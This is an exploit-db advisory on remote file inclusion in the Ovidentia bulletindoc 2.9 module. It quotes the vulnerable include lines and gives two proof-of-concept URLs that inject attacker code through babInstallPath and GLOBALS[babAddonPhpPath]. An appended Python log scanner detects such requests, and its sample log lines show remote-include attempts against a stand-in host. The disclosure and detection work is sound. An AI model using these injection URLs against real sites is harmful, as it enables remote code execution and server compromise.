exploit-db-mirror/exploits/php/webapps/38989.txt

# Title: Ovidentia Module bulletindoc 2.9 Multiple Remote File Inclusion Vulnerabilities
# Author: bd0rk
# eMail: bd0rk[at]hackermail.com
# Twitter: twitter.com/bd0rk
# Tested on: Ubuntu-Linux
# Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Fbulletindoc&file=bulletindoc-2-9.zip&idf=792
PoC1:
/bulletindoc-2-9/programs/admin.php line 2
------------------------------------------------------
include $babInstallPath."admin/acl.php";
------------------------------------------------------
[+]Sploit1: http://[s0me0ne]/bulletindoc-2-9/programs/admin.php?babInstallPath=[EviLCode]
Description: The $babInstallPath variable is not initialized before the include,
so an attacker can set it through the request and have their own code included and executed.
PoC2:
/bulletindoc-2-9/programs/main.php line 2
-------------------------------------------------------
require_once( $GLOBALS['babAddonPhpPath']."fonctions.php");
-------------------------------------------------------
[+]Sploit2: http://[s0me0ne]/bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=SHELLCODE?
Description: The problem is the same as the first. -.-
It's possible to compromise the system.
### The 27-year-old German hacker bd0rk ###
Greetz: Kacper Szurek, High-Tech Bridge, rgod, LiquidWorm
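
Detection side, as an added example that is not part of the original advisory: a log check that flags requests to the two scripts above when the query string sets the variable that reaches include/require, including the percent-encoded form of `GLOBALS[babAddonPhpPath]`. It assumes combined-format access logs and that legitimate clients never pass these parameters in the URL; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> request parameter that reaches include/require in the advisory.
WATCHED = {
    "/programs/admin.php": "babInstallPath",
    "/programs/main.php": "GLOBALS[babAddonPhpPath]",
}
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Values PHP would treat as a URL/stream wrapper instead of a local path.
WRAPPER_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*://|data:)", re.I)


def classify(line):
    """Return (script, param, value, verdict) for a flagged request, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    for suffix, param in WATCHED.items():
        if not url.path.endswith(suffix):
            continue
        # parse_qsl percent-decodes keys, so GLOBALS%5B...%5D is matched too.
        for key, value in parse_qsl(url.query, keep_blank_values=True):
            if key == param:
                verdict = "remote-include" if WRAPPER_RE.match(value) else "path-override"
                return suffix, param, value, verdict
    return None


def scan(lines):
    """Classify every line and keep only the flagged ones."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample access-log lines (documentation IPs and hosts, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Sep/2021:13:00:01 +0000] "GET /bulletindoc-2-9/programs/admin.php HTTP/1.1" 200 512',
    '192.0.2.44 - - [03/Sep/2021:13:00:07 +0000] "GET /bulletindoc-2-9/programs/admin.php?babInstallPath=http://files.example.test/x.txt? HTTP/1.1" 200 0',
    '192.0.2.44 - - [03/Sep/2021:13:00:09 +0000] "GET /bulletindoc-2-9/programs/main.php?GLOBALS%5BbabAddonPhpPath%5D=ftp%3A%2F%2Ffiles.example.test%2F HTTP/1.1" 200 0',
    '192.0.2.51 - - [03/Sep/2021:13:02:30 +0000] "GET /bulletindoc-2-9/programs/main.php?GLOBALS[babAddonPhpPath]=/tmp/ HTTP/1.1" 500 0',
    '192.0.2.10 - - [03/Sep/2021:13:03:00 +0000] "GET /index.php?tg=fileman HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

A "path-override" verdict means the parameter was set to a non-URL value; under the assumption above it is still worth reviewing, since the application is expected to set these paths itself.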